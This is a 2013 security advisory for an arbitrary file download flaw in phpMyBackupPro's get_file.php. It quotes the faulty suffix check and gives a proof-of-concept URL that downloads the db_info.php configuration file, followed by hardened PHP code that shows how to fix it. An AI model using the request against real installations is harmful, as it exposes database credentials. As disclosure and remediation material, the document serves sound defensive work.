
phpMyBackupPro (all versions) Arbitrary File Download Vulnerability

Author: TUNISIAN CYBER, Published: 17-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: phpMyBackupPro (all versions) Arbitrary File Download Vulnerability
[+] Date: 17-12-2013
[+] Category: WebApp
[+] Vendor: http://www.phpmybackuppro.net/download.php
[+] Google Dork: n/a
[+] Tested on: Win7
[+] Friend's blog: http://na3il.wordpress.com/

########################################################################################
+Description:

phpMyBackupPro is a web-based MySQL backup application written in PHP. You can schedule backups,
download them, email them or upload them with FTP, and back up whole file directories.
It offers zip and gzip compression, an easy interface and a simple installation.

Exploit:
phpMyBackupPro suffers from an Arbitrary File Download Vulnerability:

File: get_file.php
Parameter: view

[PHP]
if (isset ($_GET['view']) && file_exists($_GET['view'])) {
    $ext4 = substr($_GET['view'],-4);
    $ext5 = substr($_GET['view'],-5);
    $ext7 = substr($_GET['view'],-7);
    $ext8 = substr($_GET['view'],-8);
    if ($ext4 != ".php" && $ext5 != ".html" && $ext4 != ".htm" && $ext5 != ".php3" && $ext4 != ".sql" && $ext8 != ".sql.zip" && $ext7 != ".sql.gz") {
        echo GF_INVALID_EXT . "!";
    } else {
        // ... the requested file is sent to the client here
[/PHP]

The check only rejects a name whose suffix is outside the list above; ".php", ".php3", ".html" and ".htm" are on the list, so PHP source files pass it and are sent in the else branch. Nothing restricts the value of view to the backup directory either, so any readable file with one of those suffixes, including the application's own configuration, can be downloaded.

P.O.C:

127.0.0.1/[PATH]/phpMyBackupPro/get_file.php?download=true&view=db_info.php
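For comparison, the following is an added example (not phpMyBackupPro's own code) of how a download handler like get_file.php can be fixed. It keeps the original suffix test as a function so the flaw is visible, and beside it a hardened resolver that accepts only a bare file name with a backup extension and confirms with realpath() that the result stays inside a fixed backup directory. The directory name, the function names and the GF_INVALID_EXT constant value are assumptions for this example.

```php
<?php
// Added example, not code from phpMyBackupPro.

// The suffix test from the vulnerable handler, kept verbatim in spirit:
// it returns true when the name is ALLOWED to be served. Because ".php",
// ".php3", ".html" and ".htm" are part of the list, source files pass.
function original_check_accepts(string $view): bool
{
    $ext4 = substr($view, -4);
    $ext5 = substr($view, -5);
    $ext7 = substr($view, -7);
    $ext8 = substr($view, -8);
    $rejected = ($ext4 != ".php" && $ext5 != ".html" && $ext4 != ".htm"
        && $ext5 != ".php3" && $ext4 != ".sql" && $ext8 != ".sql.zip"
        && $ext7 != ".sql.gz");
    return !$rejected;
}

// Hardened resolver: returns the absolute path of a backup artefact that may
// be served, or null if the request must be refused.
function resolve_backup_file(string $backupDir, string $requested): ?string
{
    // 1. Only a bare file name is accepted; any directory component is refused.
    if ($requested === '' || $requested !== basename($requested)) {
        return null;
    }

    // 2. Allow-list of backup artefact suffixes. Source and markup files are
    //    never on this list, so db_info.php and friends cannot match.
    $allowed = ['.sql', '.sql.zip', '.sql.gz'];
    $suffixOk = false;
    foreach ($allowed as $ext) {
        if (substr($requested, -strlen($ext)) === $ext) {
            $suffixOk = true;
            break;
        }
    }
    if (!$suffixOk) {
        return null;
    }

    // 3. Canonicalise both the directory and the candidate file and require
    //    the file to sit directly under the backup directory. realpath()
    //    returns false for a path that does not exist.
    $base = realpath($backupDir);
    $path = realpath($backupDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    if (!is_file($path) || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Usage sketch for the request handler. 'export' is an assumed directory name.
if (isset($_GET['view'])) {
    $file = resolve_backup_file(__DIR__ . '/export', (string) $_GET['view']);
    if ($file === null) {
        http_response_code(403);
        echo 'invalid file!';          // stands in for GF_INVALID_EXT . "!"
    } else {
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Content-Length: ' . (string) filesize($file));
        readfile($file);
    }
}
```

Run against the names in this advisory, original_check_accepts("db_info.php") returns true, which is exactly the defect, while resolve_backup_file() returns null for it, for any name containing a path separator, and for any file outside the backup directory. The realpath() comparison matters even with basename() in place: it also neutralises symbolic links placed in the backup directory that point elsewhere on the filesystem.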
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################
